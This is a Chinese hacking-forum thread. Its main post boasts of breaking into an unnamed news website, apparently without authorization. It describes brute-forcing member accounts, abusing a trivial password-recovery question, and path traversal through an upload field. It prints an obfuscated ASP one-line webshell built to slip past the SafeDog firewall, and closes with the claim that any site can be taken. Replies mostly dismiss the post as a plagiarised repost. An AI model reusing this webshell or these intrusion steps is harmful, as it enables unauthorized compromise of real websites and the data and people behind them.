[【未通过】] 我是如何拿下某某新闻站

[复制链接]
管理05 发表于 2015-11-10 23:36:41 | 显示全部楼层 |阅读模式

管理|主题 |帖子 |积分 936

1.png
0x01 信息收集

服务器信息: windows 2003 + IIS 6.0 + aspx . Php + 安全狗
站点cms信息:一套aspx新闻发布系统 和 Discuz X3
端口信息 : 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。
0x02 寻找突破点
先明确下思路, 主站  - DZ论坛弱口令 getshell - 旁站 - 社工 - C段嗅探
先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。
2.png
没扫出什么东西 懒得放 WVS appcan 去扫了,手工找下敏感信息吧。
3.jpg
4.jpg
有两处登陆的地方 后台弱口令 万能密码无果  
去看一下会员中心 有个注册会员 好像是删除了,打不开
5.jpg
0x03 忘记密码找回突破

思路就快中断时候,灵光一闪 ,不是有个忘记密码么
注册不了 我们就来找回一个用户呗  说干就干
6.jpg
的确有admin 这个用户 试各种答案 都无果..
又蛋疼了.. 先静下心想想思路.....................................................
会员中心 会员中心 不就是有很多会员的么  不止一个用户 肯定有别的用户
设置一些傻瓜化问题!
打开 Burpsuite 爆破几个用户名来试试。
7.jpg
成功爆破到一个 用户 试试他的问题吧,
8.jpg 还真是傻瓜化问题 , 答案 就是问题 得到一个随机密码 登录之~
0x04 突破上传拿webshell
9.jpg

进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀
但是他用的不是原本的那个上传,这个上传点 什么东西都上传不了...
然后到处找啊找,,
10.jpg
还好找到一个可以上传的地方 附件上传  有上传就行~~上神器burp 截断试试。
11.jpg
本以为改成aspx 可以直接秒杀 ,, 但是404.. 好吧 仔细看一下上传验证
-----------------------------7def81f240104
Content-Disposition: form-data; name="File_PicPath"
news|0
-----------------------------7def81f240104
File_PicPath 参数 应该可以改 news 是新闻的意思吧
应该是上传到指定上传新闻图片附件的目录~
我们把他改为 ../ 上一级目录试试。
12.jpg
的确是 打开试试  
13.jpg
跳到上一级目录 秒杀之~  开开心心上传一句话~~
0x05 没遇到过的安全狗
上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。
14.jpg
这种安全狗没遇到过... 不过找个中文一句话秒杀之~~
附上中文一句话:
<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

密码:我爱你
本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确
总结一句话:不管你有什么拦截 只要你思路淫荡 没有你日不到的站。

=========================
手法缺乏亮点。故不予通过。
king7 发表于 2015-11-11 08:35:21 | 显示全部楼层

正式成员|主题 |帖子 |积分 139

你扫描安全狗都不拦截你?
Database 发表于 2015-11-11 08:57:32 | 显示全部楼层

正式成员|主题 |帖子 |积分 227

你扫描安全狗都不拦截你?你爆破安全狗都不拦截你?你上传安全狗都不拦截你?
小伟 发表于 2015-11-11 09:51:49 | 显示全部楼层

正式成员|主题 |帖子 |积分 75

毫无亮点
落血 发表于 2015-11-11 13:14:08 | 显示全部楼层

正式成员|主题 |帖子 |积分 37

傻瓜化问题 , 答案 就是问题 。这个楼主是怎么猜到的?还是这套系统默认就是这种
毛猴 发表于 2015-11-11 14:36:53 | 显示全部楼层

九零元老|主题 |帖子 |积分 259

偏纸!我试了中文一样拦截!
孤城浪子 发表于 2015-11-11 14:40:56 | 显示全部楼层

正式成员|主题 |帖子 |积分 162

你扫描安全狗都不拦截你?你爆破安全狗都不拦截你?你上传安全狗都不拦截你?丫的还没有验证码
Smile゛S 发表于 2015-11-12 15:01:00 | 显示全部楼层

正式成员|主题 |帖子 |积分 9

转载的,一年前的文章了。http://www.secbox.cn/hacker/web/177.html

90发完,发t00ls,投稿的人怎么想的?
MoHun 发表于 2015-11-12 15:04:31 | 显示全部楼层

正式成员|主题 |帖子 |积分 178

第一张图右下脚显示2014年,上传文件显示2014年
Edison 发表于 2015-11-12 19:44:35 | 显示全部楼层

正式成员|主题 |帖子 |积分 81

--
QQ截图20151112194334.jpg
Database 发表于 2015-11-12 20:28:01 | 显示全部楼层

正式成员|主题 |帖子 |积分 227

1.这是在别的地方转帖转过来的
2.在吐司也发了,被封号了。
芙蓉王 发表于 2015-11-13 16:05:24 | 显示全部楼层

正式成员|主题 |帖子 |积分 201

你穿马都拦截了 怎么可能扫描不拦截?
hellboy 发表于 2015-11-14 12:46:10 | 显示全部楼层

九零元老|主题 |帖子 |积分 378

密码找回,密码找回,密码找回,核心!
j33h2u 发表于 2015-11-15 10:49:26 | 显示全部楼层

正式成员|主题 |帖子 |积分 56

这人在t00ls也是发这篇文章,被踩死了。
any3ite 发表于 2015-11-16 14:49:59 | 显示全部楼层

正式成员|主题 |帖子 |积分 144

这安全狗也不管事啊
y0uki11 发表于 2015-11-16 17:08:25 | 显示全部楼层

正式成员|主题 |帖子 |积分 162

t00ls发标题原创被踩死,又拿这文章来申请,真是。。。
谦月Vip4pt 发表于 2015-12-15 13:52:49 | 显示全部楼层

正式成员|主题 |帖子 |积分 186

牛逼到狗都不敢拦了
i0day 发表于 2015-12-16 10:29:15 | 显示全部楼层

正式成员|主题 |帖子 |积分 109

看到楼上的评论,我笑了
atom 发表于 2016-2-1 22:40:33 | 显示全部楼层

正式成员|主题 |帖子 |积分 385

不多说了,楼上各位把我想说的都说了,无语。
Miss冰 发表于 2016-2-8 17:04:54 | 显示全部楼层

正式成员|主题 |帖子 |积分 311

闹到要日新闻站 才觉得很XX么?
快速回复 返回顶部 返回列表